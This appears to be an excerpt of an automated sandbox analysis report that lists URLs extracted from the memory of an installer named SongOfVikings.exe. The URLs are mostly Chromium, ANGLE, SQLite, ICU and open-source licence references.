Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007disableDrawBuffersIndexedDisable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5469
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5577
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658forceGlErrorCheckingForce
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750forceRobustResourceInitForce-enable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041forceInitShaderVariablesForce-enable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036dumpShaderSourceWrite
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279cacheCompiledShaderEnable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7527
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724disableAnisotropicFilteringDisable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760enableShaderSubstitutionCheck
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761Frontend
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://austingroupbugs.net/view.php?id=542
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://blog.izs.me)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://blog.izs.me/)
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gd_intermediate.crt0
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository100.
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cgit.freedesktop.org/xorg/xserver/tree/COPYING
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cldr.unicode.org/index/downloads
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/smhasher/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/v8
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1094869
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/110263
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1144207
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1165751
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1165751disableProgramBinaryDisable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1171371
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181068
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181193
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/308366
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/403957
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/550292
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/565179
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642227
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642605
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/644669
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/650547
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/672380
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/709351
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/797243
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/809422
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/830046
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/849576
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/883276
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/927470
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620allowTranslateUniformBlockToStructuredBufferThere
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.godaddy.com/gds1-20
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=16452
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://devel.freebsoft.org/speechd
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://developer.android.com/tools/extras/support-library.html
Source: SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ejemplo.com
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://encoding.spec.whatwg.org/#big5-encoder
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/commonnode-set..
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedorahosted.org/lohit>
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://feross.org
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fossil-scm.org).
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedesktop.org
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://gcc.gnu.org/bugzilla/show_bug.cgi?id=59788
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://git.linuxtv.org/v4l-utils.git
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://github.com/broofa
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.github.io/snappy/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icl.com/saxon
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icl.com/saxonorg.apache.xalan.xslt.extensions.RedirectxsltDocumentElem:
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icu-project.org/docs/papers/gb18030.html
Source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://int3.de/
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://istanbul-js.org/
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://juliangruber.com
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://labs.creativecommons.org/licenses/zero-waive/1.0/us/legalcode>
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://localhosthttp://127.0.0.1object-src
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://me.abelcheung.org/articles/research/what-is-cp951/
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://moztw.org/docs/big5/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mxr.mozilla.org/comm-central/source/mozilla/netwerk/base/src/nsURLParsers.cpp
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://n8.io/)
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://narwhaljs.org)
Source: SongOfVikings.exe, 00000000.00000002.1958725334.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SongOfVikings.exe, 00000000.00000000.1709135822.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0J
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.org/licenses/MIT
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://re-becca.org)
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://re-becca.org/)
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://s..
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://scripts.sil.org/OFL
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://source.android.com/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://source.android.com/compatibility)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://source.icu-project.org/repos/icu/data/trunk/charset/data/xml/gb-18030-2000.xml
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://sqlite.org/cli.html#sqlite_archive_support
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/deps/third_party/xz/COPYING
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/16459606/376773
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/398120/376773
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/5982798/376773
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc3501#section-5.1.3
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc3501#section-5.1.3)
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tukaani.org/xz/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://valgrind.org
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://web.archive.org/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://webkit.org/
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.chromium.org
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fossil-scm.org/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.freedesktop.org/wiki/Software/xdg-user-dirs
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.futurealoof.com)
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/gethelp/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/s/libtool/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gutenberg.org/ebooks/53).
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.haible.de/bruno/charsets/conversion-tables/Big5.html
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.icu-project.org/userguide/posix.html#case_mappings
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jaredhanson.net/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jclark.com/xt
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.khngai.com/chinese/charmap/tblgbk.php?page=0
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.linux-usb.org/usb-ids.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.nongnu.org/freebangfont/downloads.html#mukti
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ogcio.gov.hk/en/business/tech_promotion/ccli/terms/doc/2003cmp_2008.txt
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ogcio.gov.hk/tc/business/tech_promotion/ccli/terms/doc/hkscs-2008-big5-iso.txt
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ploscompbiol.org/static/license
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org)
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/compile.html).
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/tclsqlite.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.strongtalk.org/
